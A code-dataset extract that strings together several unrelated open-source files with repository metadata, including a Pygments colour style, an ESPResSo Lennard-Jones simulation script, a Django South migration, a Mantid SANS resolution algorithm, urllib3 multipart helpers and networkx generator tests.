        # Bug fix: this was a Python 2 'print' statement, which is a
        # SyntaxError under Python 3; the call form works on both.
        print("Install the audit-libs-python package to get syscall names")
def syscall_name(id):
    """Best-effort translation of a syscall number to its name.

    Falls back to the decimal string when the audit module (or the
    module-level machine_id) is unavailable or the lookup fails.  The
    parameter name 'id' shadows the builtin but is kept for interface
    compatibility.
    """
    try:
        return audit.audit_syscall_to_name(id, machine_id)
    # except Exception (not bare except) still catches the NameError when
    # audit/machine_id are missing, without trapping KeyboardInterrupt.
    except Exception:
        return str(id)
def strerror(nr):
    """Return the symbolic errno name for nr, sign-insensitive.

    E.g. 2 or -2 -> 'ENOENT'; unknown values yield 'Unknown N errno'.
    """
    try:
        return errno.errorcode[abs(nr)]
    # Narrowed from a bare except: only a missing errno code is expected.
    except KeyError:
        return "Unknown %d errno" % nr
| gpl-2.0 |
hortinstein/ghost_hortinstein.github.io | node_modules/grunt-docker/node_modules/docker/node_modules/pygmentize-bundled/vendor/pygments/build-3.3/pygments/styles/friendly.py | 364 | 2515 | # -*- coding: utf-8 -*-
"""
pygments.styles.friendly
~~~~~~~~~~~~~~~~~~~~~~~~
A modern style based on the VIM pyte theme.
:copyright: Copyright 2006-2013 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.style import Style
from pygments.token import Keyword, Name, Comment, String, Error, \
Number, Operator, Generic, Whitespace
class FriendlyStyle(Style):
    """
    A modern style based on the VIM pyte theme.
    """
    # Colour painted behind the highlighted code.
    background_color = "#f0f0f0"
    # Applied to tokens with no entry in 'styles' below.
    default_style = ""
    # Token -> style-definition strings; see pygments.style for the
    # "bold/italic/noitalic ... #rrggbb bg:#rrggbb border:#rrggbb" syntax.
    styles = {
        Whitespace:                "#bbbbbb",
        Comment:                   "italic #60a0b0",
        Comment.Preproc:           "noitalic #007020",
        Comment.Special:           "noitalic bg:#fff0f0",
        Keyword:                   "bold #007020",
        Keyword.Pseudo:            "nobold",
        Keyword.Type:              "nobold #902000",
        Operator:                  "#666666",
        Operator.Word:             "bold #007020",
        Name.Builtin:              "#007020",
        Name.Function:             "#06287e",
        Name.Class:                "bold #0e84b5",
        Name.Namespace:            "bold #0e84b5",
        Name.Exception:            "#007020",
        Name.Variable:             "#bb60d5",
        Name.Constant:             "#60add5",
        Name.Label:                "bold #002070",
        Name.Entity:               "bold #d55537",
        Name.Attribute:            "#4070a0",
        Name.Tag:                  "bold #062873",
        Name.Decorator:            "bold #555555",
        String:                    "#4070a0",
        String.Doc:                "italic",
        String.Interpol:           "italic #70a0d0",
        String.Escape:             "bold #4070a0",
        String.Regex:              "#235388",
        String.Symbol:             "#517918",
        String.Other:              "#c65d09",
        Number:                    "#40a070",
        Generic.Heading:           "bold #000080",
        Generic.Subheading:        "bold #800080",
        Generic.Deleted:           "#A00000",
        Generic.Inserted:          "#00A000",
        Generic.Error:             "#FF0000",
        Generic.Emph:              "italic",
        Generic.Strong:            "bold",
        Generic.Prompt:            "bold #c65d09",
        Generic.Output:            "#888",
        Generic.Traceback:         "#04D",
        Error:                     "border:#FF0000"
    }
| mit |
KKleinbeck/Espresso-Personal | samples/python/lj_liquid.py | 4 | 6626 | #
# Copyright (C) 2013,2014 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import print_function
import espressomd._system as es
import espressomd
from espressomd import thermostat
from espressomd import code_info
from espressomd import analyze
from espressomd import integrate
import numpy
# Demo script: a Lennard-Jones liquid simulated through the ESPResSo
# python interface (warmup with a capped potential, then production run).
print("""
=======================================================
= lj_liquid.py =
=======================================================
Program Information:""")
print(code_info.features())
dev="cpu"
# System parameters
#############################################################
# 10 000 Particles
box_l = 10.7437
density = 0.7
# Interaction parameters (repulsive Lennard Jones)
#############################################################
lj_eps = 1.0
lj_sig = 1.0
lj_cut = 1.12246
lj_cap = 20
# Integration parameters
#############################################################
system = espressomd.System()
system.time_step = 0.01
system.skin = 0.4
#es._espressoHandle.Tcl_Eval('thermostat langevin 1.0 1.0')
# Langevin thermostat with temperature 1.0 and friction gamma 1.0
thermostat.Thermostat().setLangevin(1.0,1.0)
# warmup integration (with capped LJ potential)
warm_steps = 100
warm_n_times = 30
# do the warmup until the particles have at least the distance min_dist
min_dist = 0.9
# integration
int_steps = 1000
int_n_times = 5
#############################################################
# Setup System #
#############################################################
# Interaction setup
#############################################################
system.box_l = [box_l,box_l,box_l]
system.nonBondedInter[0,0].lennardJones.setParams(
epsilon=lj_eps, sigma=lj_sig,
cutoff=lj_cut, shift="auto")
system.nonBondedInter.setForceCap(lj_cap)
print("LJ-parameters:")
print(system.nonBondedInter[0,0].lennardJones.getParams())
# Particle setup
#############################################################
volume = box_l*box_l*box_l
n_part = int(volume*density)
# place n_part particles at uniformly random positions inside the box
for i in range(n_part):
    system.part[i].pos=numpy.random.random(3)*system.box_l
# NOTE(review): return value of distto() is discarded -- presumably kept
# as an API smoke test; confirm whether this call is still needed.
analyze.distto(system, 0)
print("Simulate {} particles in a cubic simulation box {} at density {}."
.format(n_part, box_l, density).strip())
print("Interactions:\n")
act_min_dist = analyze.mindist()
print("Start with minimal distance {}".format(act_min_dist))
system.max_num_cells = 2744
#############################################################
# Warmup Integration #
#############################################################
#open Observable file
obs_file = open("pylj_liquid.obs", "w")
obs_file.write("# Time\tE_tot\tE_kin\tE_pot\n")
#set obs_file [open "$name$ident.obs" "w"]
#puts $obs_file "\# System: $name$ident"
#puts $obs_file "\# Time\tE_tot\tE_kin\t..."
print("""
Start warmup integration:
At maximum {} times {} steps
Stop if minimal distance is larger than {}
""".strip().format(warm_n_times, warm_steps, min_dist))
# set LJ cap
lj_cap = 20
system.nonBondedInter.setForceCap(lj_cap)
print(system.nonBondedInter[0,0].lennardJones)
# Warmup Integration Loop
i = 0
while (i < warm_n_times and act_min_dist < min_dist):
    integrate.integrate(warm_steps)
    # Warmup criterion
    act_min_dist = analyze.mindist()
#    print("\rrun %d at time=%f (LJ cap=%f) min dist = %f\r" % (i,system.time,lj_cap,act_min_dist), end=' ')
    i += 1
#   write observables
#    puts $obs_file "{ time [setmd time] } [analyze energy]"
#   Increase LJ cap gradually so the capped potential approaches full LJ
    lj_cap = lj_cap + 10
    system.nonBondedInter.setForceCap(lj_cap)
# Just to see what else we may get from the c code
print("""
ro variables:
cell_grid {0.cell_grid}
cell_size {0.cell_size}
local_box_l {0.local_box_l}
max_cut {0.max_cut}
max_part {0.max_part}
max_range {0.max_range}
max_skin {0.max_skin}
n_nodes {0.n_nodes}
n_part {0.n_part}
n_part_types {0.n_part_types}
periodicity {0.periodicity}
transfer_rate {0.transfer_rate}
verlet_reuse {0.verlet_reuse}
""".format(system))
# write parameter file
#polyBlockWrite "$name$ident.set" {box_l time_step skin} ""
set_file = open("pylj_liquid.set", "w")
set_file.write("box_l %s\ntime_step %s\nskin %s\n" % (box_l, system.time_step, system.skin))
#############################################################
# Integration #
#############################################################
print("\nStart integration: run %d times %d steps" % (int_n_times, int_steps))
# remove force capping (cap 0 disables it) for the production run
lj_cap = 0
system.nonBondedInter.setForceCap(lj_cap)
print(system.nonBondedInter[0,0].lennardJones)
# print initial energies
#energies = es._espressoHandle.Tcl_Eval('analyze energy')
energies = analyze.energy(system=system)
print(energies)
j = 0
for i in range(0,int_n_times):
    print("run %d at time=%f " % (i,system.time))
#    es._espressoHandle.Tcl_Eval('integrate %d' % int_steps)
    integrate.integrate(int_steps)
#    energies = es._espressoHandle.Tcl_Eval('analyze energy')
    energies = analyze.energy(system=system)
    print(energies)
    obs_file.write('{ time %s } %s\n' % (system.time,energies))
#   write observables
#    set energies [analyze energy]
#    puts $obs_file "{ time [setmd time] } $energies"
#    puts -nonewline "temp = [expr [lindex $energies 1 1]/(([degrees_of_freedom]/2.0)*[setmd n_part])]\r"
#    flush stdout
#   write intermediate configuration
#    if { $i%10==0 } {
#        polyBlockWrite "$name$ident.[format %04d $j]" {time box_l} {id pos type}
#        incr j
#    }
# write end configuration
end_file = open("pylj_liquid.end", "w")
end_file.write("{ time %f } \n { box_l %f }\n" % (system.time, box_l) )
end_file.write("{ particles {id pos type} }")
for i in range(n_part):
    end_file.write("%s\n" % system.part[i].pos)
# id & type not working yet
obs_file.close()
set_file.close()
end_file.close()
#es._espressoHandle.die()
# terminate program
print("\nFinished.")
| gpl-3.0 |
localwiki/localwiki-backend-server | localwiki/tags/migrations/0001_initial.py | 3 | 13018 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """South schema migration: creates the ``Tag`` / ``PageTagSet`` models,
    their versioned ``*_hist`` twins and the two M2M join tables.

    NOTE: this file is machine-generated by South (the ``models`` dict is a
    frozen ORM snapshot) -- do not hand-edit the field definitions.
    """
    def forwards(self, orm):
        """Apply the migration: create tables, M2M joins and signals."""
        # Adding model 'Tag'
        db.create_table('tags_tag', (
            ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('name', self.gf('django.db.models.fields.CharField')(max_length=100)),
            ('slug', self.gf('django.db.models.fields.CharField')(unique=True, max_length=100)),
        ))
        db.send_create_signal('tags', ['Tag'])
        # Adding model 'Tag_hist'
        db.create_table('tags_tag_hist', (
            ('id', self.gf('django.db.models.fields.IntegerField')(db_index=True, blank=True)),
            ('name', self.gf('django.db.models.fields.CharField')(max_length=100)),
            ('slug', self.gf('django.db.models.fields.CharField')(max_length=100, db_index=True)),
            ('history_id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('history_date', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
            ('history_type', self.gf('django.db.models.fields.SmallIntegerField')()),
            ('history_reverted_to_version', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['tags.Tag_hist'], null=True)),
            ('history_comment', self.gf('django.db.models.fields.CharField')(max_length=200, null=True, blank=True)),
            ('history_user', self.gf('versionutils.versioning.fields.AutoUserField')(to=orm['auth.User'], null=True)),
            ('history_user_ip', self.gf('versionutils.versioning.fields.AutoIPAddressField')(max_length=15, null=True)),
        ))
        db.send_create_signal('tags', ['Tag_hist'])
        # Adding model 'PageTagSet'
        db.create_table('tags_pagetagset', (
            ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('page', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['pages.Page'], unique=True)),
        ))
        db.send_create_signal('tags', ['PageTagSet'])
        # Adding M2M table for field tags on 'PageTagSet'
        db.create_table('tags_pagetagset_tags', (
            ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
            ('pagetagset', models.ForeignKey(orm['tags.pagetagset'], null=False)),
            ('tag', models.ForeignKey(orm['tags.tag'], null=False))
        ))
        db.create_unique('tags_pagetagset_tags', ['pagetagset_id', 'tag_id'])
        # Adding model 'PageTagSet_hist'
        db.create_table('tags_pagetagset_hist', (
            ('id', self.gf('django.db.models.fields.IntegerField')(db_index=True, blank=True)),
            ('history_id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('history_date', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
            ('history_type', self.gf('django.db.models.fields.SmallIntegerField')()),
            ('history_reverted_to_version', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['tags.PageTagSet_hist'], null=True)),
            ('history_comment', self.gf('django.db.models.fields.CharField')(max_length=200, null=True, blank=True)),
            ('history_user', self.gf('versionutils.versioning.fields.AutoUserField')(to=orm['auth.User'], null=True)),
            ('history_user_ip', self.gf('versionutils.versioning.fields.AutoIPAddressField')(max_length=15, null=True)),
            ('page', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['pages.Page_hist'])),
        ))
        db.send_create_signal('tags', ['PageTagSet_hist'])
        # Adding M2M table for field tags on 'PageTagSet_hist'
        db.create_table('tags_pagetagset_hist_tags', (
            ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
            ('pagetagset_hist', models.ForeignKey(orm['tags.pagetagset_hist'], null=False)),
            ('tag_hist', models.ForeignKey(orm['tags.tag_hist'], null=False))
        ))
        db.create_unique('tags_pagetagset_hist_tags', ['pagetagset_hist_id', 'tag_hist_id'])
    def backwards(self, orm):
        """Reverse the migration: drop every table created in forwards()."""
        # Deleting model 'Tag'
        db.delete_table('tags_tag')
        # Deleting model 'Tag_hist'
        db.delete_table('tags_tag_hist')
        # Deleting model 'PageTagSet'
        db.delete_table('tags_pagetagset')
        # Removing M2M table for field tags on 'PageTagSet'
        db.delete_table('tags_pagetagset_tags')
        # Deleting model 'PageTagSet_hist'
        db.delete_table('tags_pagetagset_hist')
        # Removing M2M table for field tags on 'PageTagSet_hist'
        db.delete_table('tags_pagetagset_hist_tags')
    # Frozen ORM snapshot used by South to build the `orm` object above.
    models = {
        'auth.group': {
            'Meta': {'object_name': 'Group'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        'auth.permission': {
            'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        'auth.user': {
            'Meta': {'object_name': 'User'},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'unique': 'True', 'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        },
        'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        'pages.page': {
            'Meta': {'object_name': 'Page'},
            'content': ('pages.fields.WikiHTMLField', [], {}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255'})
        },
        'pages.page_hist': {
            'Meta': {'ordering': "('-history_date',)", 'object_name': 'Page_hist'},
            'content': ('pages.fields.WikiHTMLField', [], {}),
            'history_comment': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
            'history_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'history_id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'history_reverted_to_version': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['pages.Page_hist']", 'null': 'True'}),
            'history_type': ('django.db.models.fields.SmallIntegerField', [], {}),
            'history_user': ('versionutils.versioning.fields.AutoUserField', [], {'to': "orm['auth.User']", 'null': 'True'}),
            'history_user_ip': ('versionutils.versioning.fields.AutoIPAddressField', [], {'max_length': '15', 'null': 'True'}),
            'id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True', 'blank': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255'})
        },
        'tags.pagetagset': {
            'Meta': {'ordering': "('page__slug',)", 'object_name': 'PageTagSet'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'page': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['pages.Page']", 'unique': 'True'}),
            'tags': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['tags.Tag']", 'symmetrical': 'False'})
        },
        'tags.pagetagset_hist': {
            'Meta': {'ordering': "('-history_date',)", 'object_name': 'PageTagSet_hist'},
            'history_comment': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
            'history_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'history_id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'history_reverted_to_version': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['tags.PageTagSet_hist']", 'null': 'True'}),
            'history_type': ('django.db.models.fields.SmallIntegerField', [], {}),
            'history_user': ('versionutils.versioning.fields.AutoUserField', [], {'to': "orm['auth.User']", 'null': 'True'}),
            'history_user_ip': ('versionutils.versioning.fields.AutoIPAddressField', [], {'max_length': '15', 'null': 'True'}),
            'id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True', 'blank': 'True'}),
            'page': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['pages.Page_hist']"}),
            'tags': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['tags.Tag_hist']", 'symmetrical': 'False'})
        },
        'tags.tag': {
            'Meta': {'ordering': "('slug',)", 'object_name': 'Tag'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'slug': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'})
        },
        'tags.tag_hist': {
            'Meta': {'ordering': "('-history_date',)", 'object_name': 'Tag_hist'},
            'history_comment': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
            'history_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'history_id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'history_reverted_to_version': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['tags.Tag_hist']", 'null': 'True'}),
            'history_type': ('django.db.models.fields.SmallIntegerField', [], {}),
            'history_user': ('versionutils.versioning.fields.AutoUserField', [], {'to': "orm['auth.User']", 'null': 'True'}),
            'history_user_ip': ('versionutils.versioning.fields.AutoIPAddressField', [], {'max_length': '15', 'null': 'True'}),
            'id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True', 'blank': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'slug': ('django.db.models.fields.CharField', [], {'max_length': '100', 'db_index': 'True'})
        }
    }
complete_apps = ['tags'] | gpl-2.0 |
rosswhitfield/mantid | Framework/PythonInterface/plugins/algorithms/WorkflowAlgorithms/ReactorSANSResolution.py | 3 | 4146 | # Mantid Repository : https://github.com/mantidproject/mantid
#
# Copyright © 2018 ISIS Rutherford Appleton Laboratory UKRI,
# NScD Oak Ridge National Laboratory, European Spallation Source,
# Institut Laue - Langevin & CSNS, Institute of High Energy Physics, CAS
# SPDX - License - Identifier: GPL - 3.0 +
#pylint: disable=no-init
from mantid.api import *
from mantid.kernel import *
import math
class ReactorSANSResolution(PythonAlgorithm):
    """
    Calculate and populate the Q resolution
    """
    def category(self):
        # Category under which the algorithm is listed in Mantid.
        return "SANS"
    def seeAlso(self):
        return [ "EQSANSResolution" ]
    def name(self):
        return "ReactorSANSResolution"
    def summary(self):
        return "Compute the resolution in Q according to Mildner-Carpenter"
    def PyInit(self):
        """Declare the algorithm properties."""
        # Input workspace
        self.declareProperty(MatrixWorkspaceProperty("InputWorkspace", "",
                                                     direction=Direction.Input),
                             "Name the workspace to calculate the resolution for")
        # Dummy property for temporary backward compatibility
        # The output workspace property is not used and the resolution is
        # added to the input workspace
        self.declareProperty("OutputWorkspace", "",
                             doc="Obsolete: not used - The resolution is added to input workspace")
    def PyExec(self):
        """Compute dQ for each bin of the input workspace (first spectrum)
        and write it into the workspace's Dx array in place.

        All geometry parameters are read from the run's sample logs; if any
        is missing a RuntimeError is raised.
        """
        input_ws = self.getProperty("InputWorkspace").value
        # Q resolution calculation
        # All distances in mm
        wvl = None
        if input_ws.getRun().hasProperty("wavelength"):
            wvl = input_ws.getRun().getProperty("wavelength").value
        d_wvl = None
        # Prefer the ratio form of the wavelength spread if it is logged.
        if input_ws.getRun().hasProperty("wavelength-spread-ratio"):
            d_wvl = input_ws.getRun().getProperty("wavelength-spread-ratio").value
        elif input_ws.getRun().hasProperty("wavelength-spread"):
            d_wvl = input_ws.getRun().getProperty("wavelength-spread").value
        source_apert_radius = None
        if input_ws.getRun().hasProperty("source-aperture-diameter"):
            source_apert_radius = input_ws.getRun().getProperty("source-aperture-diameter").value/2.0
        sample_apert_radius = None
        if input_ws.getRun().hasProperty("sample-aperture-diameter"):
            sample_apert_radius = input_ws.getRun().getProperty("sample-aperture-diameter").value/2.0
        source_sample_distance = None
        if input_ws.getRun().hasProperty("source-sample-distance"):
            source_sample_distance = input_ws.getRun().getProperty("source-sample-distance").value
        sample_detector_distance = None
        # NOTE: this log name uses underscores while the others use dashes
        # -- that matches how the reduction stores it; do not "fix" it.
        if input_ws.getRun().hasProperty("sample_detector_distance"):
            sample_detector_distance = input_ws.getRun().getProperty("sample_detector_distance").value
        pixel_size_x = input_ws.getInstrument().getNumberParameter("x-pixel-size")[0]
        if wvl is not None and d_wvl is not None \
            and source_apert_radius is not None and sample_apert_radius is not None \
                and source_sample_distance is not None and sample_detector_distance is not None:
            k = 2.0*math.pi/wvl
            # Q-independent geometric contributions:
            # source aperture, sample aperture, and detector pixel
            # (uniform pixel distribution gives the /12.0 factor).
            res_factor = math.pow(k*source_apert_radius/source_sample_distance, 2)/4.0
            res_factor += (math.pow(k*sample_apert_radius*(source_sample_distance+sample_detector_distance)
                                    / (source_sample_distance*sample_detector_distance), 2)/4.0)
            res_factor += math.pow(k*pixel_size_x/sample_detector_distance, 2)/12.0
            for i in range(len(input_ws.readDx(0))):
                # Point data has Dx aligned with X; histogram data needs
                # the bin centre.
                if len(input_ws.readDx(0)) == len(input_ws.readX(0)):
                    center = input_ws.readX(0)[i]
                else:
                    center = 0.5*(input_ws.readX(0)[i] + input_ws.readX(0)[i+1])
                input_ws.dataDx(0)[i] = math.sqrt(res_factor+math.pow((center*d_wvl), 2)/6.0)
        else:
            raise RuntimeError("ReactorSANSResolution could not find all the run parameters needed to compute the resolution.")
# Register the algorithm with Mantid's factory so it is discoverable.
AlgorithmFactory.subscribe(ReactorSANSResolution)
| gpl-3.0 |
nan86150/ImageFusion | ENV2.7/lib/python2.7/site-packages/pip/_vendor/requests/packages/urllib3/fields.py | 1007 | 5833 | import email.utils
import mimetypes
from .packages import six
def guess_content_type(filename, default='application/octet-stream'):
    """
    Best-effort MIME type lookup for *filename*.

    Falls back to *default* when no filename is given or when the
    :mod:`mimetypes` registry has no entry for its extension.
    """
    if not filename:
        return default
    guessed, _encoding = mimetypes.guess_type(filename)
    return guessed or default
def format_header_param(name, value):
    """
    Format and quote one multipart header parameter.

    Values that are plain ASCII and free of quote/backslash/CR/LF
    characters are emitted as ``name="value"``; anything else is encoded
    per RFC 2231 (as suggested by RFC 2388 Section 4.4) into the
    ``name*=utf-8''...`` form.

    :param name:
        The name of the parameter, a string expected to be ASCII only.
    :param value:
        The value of the parameter, provided as a unicode string.
    """
    has_special = any(ch in value for ch in '"\\\r\n')
    if not has_special:
        candidate = '%s="%s"' % (name, value)
        try:
            candidate.encode('ascii')
            return candidate
        except UnicodeEncodeError:
            # Non-ASCII value: fall through to RFC 2231 encoding.
            pass
    if not six.PY3:  # Python 2: encode_rfc2231 expects a byte string here
        value = value.encode('utf-8')
    encoded = email.utils.encode_rfc2231(value, 'utf-8')
    return '%s*=%s' % (name, encoded)
class RequestField(object):
    """
    A data container for request body parameters.

    :param name:
        The name of this request field.
    :param data:
        The data/value body.
    :param filename:
        An optional filename of the request field.
    :param headers:
        An optional dict-like object of headers to initially use for the field.
    """
    def __init__(self, name, data, filename=None, headers=None):
        self._name = name
        self._filename = filename
        self.data = data
        self.headers = {}
        if headers:
            # Copy so the caller's mapping is never mutated through us.
            self.headers = dict(headers)
    @classmethod
    def from_tuples(cls, fieldname, value):
        """
        A :class:`~urllib3.fields.RequestField` factory from old-style tuple parameters.

        Supports constructing :class:`~urllib3.fields.RequestField` from
        parameter of key/value strings AND key/filetuple. A filetuple is a
        (filename, data, MIME type) tuple where the MIME type is optional.
        For example::

            'foo': 'bar',
            'fakefile': ('foofile.txt', 'contents of foofile'),
            'realfile': ('barfile.txt', open('realfile').read()),
            'typedfile': ('bazfile.bin', open('bazfile').read(), 'image/jpeg'),
            'nonamefile': 'contents of nonamefile field',

        Field names and filenames must be unicode.
        """
        if isinstance(value, tuple):
            if len(value) == 3:
                filename, data, content_type = value
            else:
                # 2-tuple: derive the MIME type from the filename.
                filename, data = value
                content_type = guess_content_type(filename)
        else:
            # Bare value: a simple (non-file) form field.
            filename = None
            content_type = None
            data = value
        request_param = cls(fieldname, data, filename=filename)
        request_param.make_multipart(content_type=content_type)
        return request_param
    def _render_part(self, name, value):
        """
        Overridable helper function to format a single header parameter.

        :param name:
            The name of the parameter, a string expected to be ASCII only.
        :param value:
            The value of the parameter, provided as a unicode string.
        """
        return format_header_param(name, value)
    def _render_parts(self, header_parts):
        """
        Helper function to format and quote a single header.

        Useful for single headers that are composed of multiple items. E.g.,
        'Content-Disposition' fields.

        :param header_parts:
            A sequence of (k, v) typles or a :class:`dict` of (k, v) to format
            as `k1="v1"; k2="v2"; ...`.
        """
        parts = []
        iterable = header_parts
        if isinstance(header_parts, dict):
            iterable = header_parts.items()
        for name, value in iterable:
            # Falsy values (None, '') are skipped entirely.
            if value:
                parts.append(self._render_part(name, value))
        return '; '.join(parts)
    def render_headers(self):
        """
        Renders the headers for this request field.
        """
        lines = []
        # Emit the well-known headers first, in a fixed order...
        sort_keys = ['Content-Disposition', 'Content-Type', 'Content-Location']
        for sort_key in sort_keys:
            if self.headers.get(sort_key, False):
                lines.append('%s: %s' % (sort_key, self.headers[sort_key]))
        # ...then any remaining custom headers, skipping falsy values.
        for header_name, header_value in self.headers.items():
            if header_name not in sort_keys:
                if header_value:
                    lines.append('%s: %s' % (header_name, header_value))
        # Trailing blank line terminates the header block.
        lines.append('\r\n')
        return '\r\n'.join(lines)
    def make_multipart(self, content_disposition=None, content_type=None,
                       content_location=None):
        """
        Makes this request field into a multipart request field.

        This method overrides "Content-Disposition", "Content-Type" and
        "Content-Location" headers to the request parameter.

        :param content_type:
            The 'Content-Type' of the request body.
        :param content_location:
            The 'Content-Location' of the request body.
        """
        self.headers['Content-Disposition'] = content_disposition or 'form-data'
        # Append '; name="..."; filename="..."' to the disposition.
        self.headers['Content-Disposition'] += '; '.join([
            '', self._render_parts(
                (('name', self._name), ('filename', self._filename))
            )
        ])
        self.headers['Content-Type'] = content_type
        self.headers['Content-Location'] = content_location
| mit |
jeffery-do/Vizdoombot | doom/lib/python3.5/site-packages/networkx/generators/tests/test_directed.py | 77 | 1313 | #!/usr/bin/env python
"""Generators - Directed Graphs
----------------------------
"""
from nose.tools import *
from networkx import *
from networkx.generators.directed import *
class TestGeneratorsDirected():
    """Tests for networkx's directed random-graph generators."""
    def test_smoke_test_random_graphs(self):
        # Just exercise each generator; passing means "no exception".
        G=gn_graph(100)
        G=gnr_graph(100,0.5)
        G=gnc_graph(100)
        G=scale_free_graph(100)
    def test_create_using_keyword_arguments(self):
        # An undirected Graph() as create_using must be rejected.
        assert_raises(networkx.exception.NetworkXError,
                      gn_graph, 100, create_using=Graph())
        assert_raises(networkx.exception.NetworkXError,
                      gnr_graph, 100, 0.5, create_using=Graph())
        assert_raises(networkx.exception.NetworkXError,
                      gnc_graph, 100, create_using=Graph())
        assert_raises(networkx.exception.NetworkXError,
                      scale_free_graph, 100, create_using=Graph())
        # With the same seed, DiGraph and MultiDiGraph output must agree.
        G=gn_graph(100,seed=1)
        MG=gn_graph(100,create_using=MultiDiGraph(),seed=1)
        assert_equal(G.edges(), MG.edges())
        G=gnr_graph(100,0.5,seed=1)
        MG=gnr_graph(100,0.5,create_using=MultiDiGraph(),seed=1)
        assert_equal(G.edges(), MG.edges())
        G=gnc_graph(100,seed=1)
        MG=gnc_graph(100,create_using=MultiDiGraph(),seed=1)
        assert_equal(G.edges(), MG.edges())
| mit |
